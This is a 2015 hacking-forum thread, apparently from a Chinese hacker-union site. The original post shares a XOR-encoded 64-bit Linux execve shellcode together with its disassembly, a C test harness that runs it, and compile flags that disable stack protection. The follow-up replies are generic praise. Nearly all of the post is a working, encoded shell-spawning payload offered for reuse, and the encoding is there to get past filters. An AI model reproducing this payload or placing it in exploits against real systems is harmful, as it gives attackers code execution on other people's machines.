社区首页 › 漏洞情报 › encoded 64 bit execve shellcode

90_ 发表于 2015-6-30 12:57:39

encoded 64 bit execve shellcode

/*
Compile with: gcc -fno-stack-protector -z execstack
This execve shellcode is encoded with 0xff and is for 64 bit linux.
 
shell:     file format elf64-x86-64
 
 
Disassembly of section .text:
 
0000000000400080 <start>:
  400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff
  400087:=09ff ff ff=20
  40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae
  400091:=09f0 fa ff=20
  400094:=0949 31 c8             =09xor    r8,rcx
  400097:=0941 50                =09push   r8
  400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0
  4000a0:=09d0 8c 97=20
  4000a3:=0949 31 c8             =09xor    r8,rcx
  4000a6:=0941 50                =09push   r8
  4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7
  4000af:=09c4 b7 46=20
  4000b2:=0949 31 c8             =09xor    r8,rcx
  4000b5:=0941 50                =09push   r8
  4000b7:=09ff e4                =09jmp    rsp
 
2015 William Borskey
 
*/
char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";
 
int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) shellcode;
    (int)(*func)();
     return 0;
}

admin1964 发表于 2015-6-30 17:13:23

还是不错的哦，顶了

ruguoruo 发表于 2015-7-1 06:05:16

学习学习技术，加油！

Micah 发表于 2015-7-1 23:35:44

支持，看起来不错呢！

H.U.C-麦麦 发表于 2015-7-2 03:47:24

感谢楼主的分享~

Micah 发表于 2015-7-2 09:29:16

支持，看起来不错呢！

Micah 发表于 2015-7-3 02:54:57

支持，看起来不错呢！

若冰 发表于 2015-7-3 15:30:56

支持中国红客联盟(ihonker.org)

a136 发表于 2015-7-4 14:03:43

学习学习技术，加油！

H.U.C—Prince 发表于 2015-7-4 16:42:06

查看完整版本: encoded 64 bit execve shellcode